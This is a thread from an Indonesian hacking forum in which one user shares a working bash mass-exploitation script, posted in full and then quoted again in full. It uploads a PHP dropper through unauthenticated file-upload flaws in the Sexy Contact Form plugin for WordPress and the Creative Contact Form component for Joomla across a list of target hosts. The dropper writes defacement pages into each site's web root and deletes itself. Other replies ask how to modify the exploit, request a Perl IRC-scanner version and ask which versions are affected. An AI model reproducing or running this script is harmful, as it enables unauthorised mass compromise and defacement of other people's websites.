[Share] [BASH] Revslider Exploit Wordpress
#11
(05-18-2015, 11:56 PM)flips Wrote: wihh makasih om shareannya

kalo boleh tau ini cara kerja exploitnya gmn ya ? oiya itu kan write cssnya kalo misalkan mau write file yang php gimana mas ?

coba yang ini om Contact Form
Code:
#!/bin/bash
#
#

read -p "List Target = " list
if [ ! -f $list ];then
echo " + List target tdk ada cuk.. "
exit
fi
FCK=$RANDOM
if [ ! -d tmp ];then
mkdir tmp
fi
if [ ! -d log ];then
mkdir log
fi

if [ ! -f rr.php ];then
cat > rr.php <<_EOF
<?php \$file="<title>Creed</title><center><div id=q>Creed<br><font size=2>Creed <style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}";  \$path = \$_SERVER["DOCUMENT_ROOT"];  \$r=fopen(\$path."/nyet.htm", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/images/nyet.htm", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/wp-content/nyet.htm", "w");fwrite(\$r,\$file);fclose(\$r);echo md5("creed");unlink(__FILE__); ?>
_EOF
fi

CekDFC(){
czone=${2}
if [ -f tmp/${FCK}gck.txt ];then
  rm -f tmp/${FCK}gck.txt
fi
if [ -f tmp/${FCK}hasil.txt ];then
  rm -f tmp/${FCK}hasil.txt
fi
curl --silent --max-time 10 --connect-timeout 10 -A "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)" "${1}" -o tmp/${FCK}gck.txt
  if [ -f tmp/${FCK}gck.txt ];then
    cat tmp/${FCK}gck.txt | grep -i "Creed" >/dev/null;gck=$?
    if [ $gck -eq 0 ];then
     echo " + File found $1"
     if [ $czone -eq 1 ];then
      echo "${1}" > tmp/${FCK}empes.txt
      break
     fi
    fi
  fi
}

CekDFC5(){
#echo " - check file $1"
curl --silent --max-time 10 --connect-timeout 10 "${1}" -o tmp/${FCK}w00t
cat tmp/${FCK}w00t | grep -i "38db7ce1861ee11b6a231c764662b68a" >/dev/null;cwot=$?
   if [ $cwot -eq 0 ];then
    echo " + Exploit Success"
    CekDFC "http://${HOSTX}/nyet.htm" 1
    CekDFC "http://${HOSTX}/wp-content/nyet.htm" 1
    CekDFC "http://${HOSTX}/components/nyet.htm" 1
   fi
}

SexyWP(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/${FCK}resp.txt \
-A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-F "files[][email protected]" \
--request POST  "http://${HOSTX}/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php"
CekDFC5 "http://${HOSTX}/wp-content/plugins/sexy-contact-form/includes/fileupload/files/rr.php"
}

SexyJM(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/${FCK}resp.txt \
-A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-F "files[][email protected]" \
--request POST  "http://${HOSTX}/components/com_creativecontactform/fileupload/index.php"
CekDFC5 "http://${HOSTX}/components/com_creativecontactform/fileupload/files/rr.php"
}

VulnSexy(){
curl --silent --max-time 10 --connect-timeout 10 "http://${HOSTX}/index.php" -o tmp/${FCK}cvuln
if [ ! -f tmp/${FCK}cvuln ];then
   rm -f tmp/${FCK}*
   continue
fi
cat tmp/${FCK}cvuln | grep "wp-content" >/dev/null;csexy=$?
if [ $csexy -eq 0 ];then
   echo " + Wordpress Detect"
   SexyWP
   else
   echo " + Joomla Detect"
   SexyJM
fi
}

for HOSTX in `cat $list`
do
VulnSexy
done
I'm Not Jomblo | I'm Not Single | I'm Just Linuxer


#12
(05-19-2015, 04:27 AM)Creed Wrote:
(05-18-2015, 11:56 PM)flips Wrote: wihh makasih om shareannya

kalo boleh tau ini cara kerja exploitnya gmn ya ? oiya itu kan write cssnya kalo misalkan mau write file yang php gimana mas ?

coba yang ini om Contact Form
Spoiler! :

Code:
#!/bin/bash
#
#

read -p "List Target = " list
if [ ! -f $list ];then
echo " + List target tdk ada cuk.. "
exit
fi
FCK=$RANDOM
if [ ! -d tmp ];then
mkdir tmp
fi
if [ ! -d log ];then
mkdir log
fi

if [ ! -f rr.php ];then
cat > rr.php <<_EOF
<?php \$file="<title>Creed</title><center><div id=q>Creed<br><font size=2>Creed <style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}";  \$path = \$_SERVER["DOCUMENT_ROOT"];  \$r=fopen(\$path."/nyet.htm", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/images/nyet.htm", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/wp-content/nyet.htm", "w");fwrite(\$r,\$file);fclose(\$r);echo md5("creed");unlink(__FILE__); ?>
_EOF
fi

CekDFC(){
czone=${2}
if [ -f tmp/${FCK}gck.txt ];then
 rm -f tmp/${FCK}gck.txt
fi
if [ -f tmp/${FCK}hasil.txt ];then
 rm -f tmp/${FCK}hasil.txt
fi
curl --silent --max-time 10 --connect-timeout 10 -A "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)" "${1}" -o tmp/${FCK}gck.txt
 if [ -f tmp/${FCK}gck.txt ];then
   cat tmp/${FCK}gck.txt | grep -i "Creed" >/dev/null;gck=$?
   if [ $gck -eq 0 ];then
    echo " + File found $1"
    if [ $czone -eq 1 ];then
     echo "${1}" > tmp/${FCK}empes.txt
     break
    fi
   fi
 fi
}

CekDFC5(){
#echo " - check file $1"
curl --silent --max-time 10 --connect-timeout 10 "${1}" -o tmp/${FCK}w00t
cat tmp/${FCK}w00t | grep -i "38db7ce1861ee11b6a231c764662b68a" >/dev/null;cwot=$?
  if [ $cwot -eq 0 ];then
   echo " + Exploit Success"
   CekDFC "http://${HOSTX}/nyet.htm" 1
   CekDFC "http://${HOSTX}/wp-content/nyet.htm" 1
   CekDFC "http://${HOSTX}/components/nyet.htm" 1
  fi
}

SexyWP(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/${FCK}resp.txt \
-A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-F "files[][email protected]" \
--request POST  "http://${HOSTX}/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php"
CekDFC5 "http://${HOSTX}/wp-content/plugins/sexy-contact-form/includes/fileupload/files/rr.php"
}

SexyJM(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/${FCK}resp.txt \
-A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-F "files[][email protected]" \
--request POST  "http://${HOSTX}/components/com_creativecontactform/fileupload/index.php"
CekDFC5 "http://${HOSTX}/components/com_creativecontactform/fileupload/files/rr.php"
}

VulnSexy(){
curl --silent --max-time 10 --connect-timeout 10 "http://${HOSTX}/index.php" -o tmp/${FCK}cvuln
if [ ! -f tmp/${FCK}cvuln ];then
  rm -f tmp/${FCK}*
  continue
fi
cat tmp/${FCK}cvuln | grep "wp-content" >/dev/null;csexy=$?
if [ $csexy -eq 0 ];then
  echo " + Wordpress Detect"
  SexyWP
  else
  echo " + Joomla Detect"
  SexyJM
fi
}

for HOSTX in `cat $list`
do
VulnSexy
done

itu bukan revslider lagi ya?
kalo boleh tau itu gmn ya mas cara jalan exploitnya biar bisa tak modif2 wkkw

thx before

#13
who have the revslider exploit "perl version" for irc scanner ? tnx a lot

#14
i have bro
but has errors when execution

[Image: do.php?img=14]

#15
Wah wah. Boleh dicoba nih. Nice share Big Grin

#16
itu bisa dpke WP versi brpa aja ya?
btw, nice share.
antonl | Psycho Security | [email protected]






Users browsing this thread: 1 Guest(s)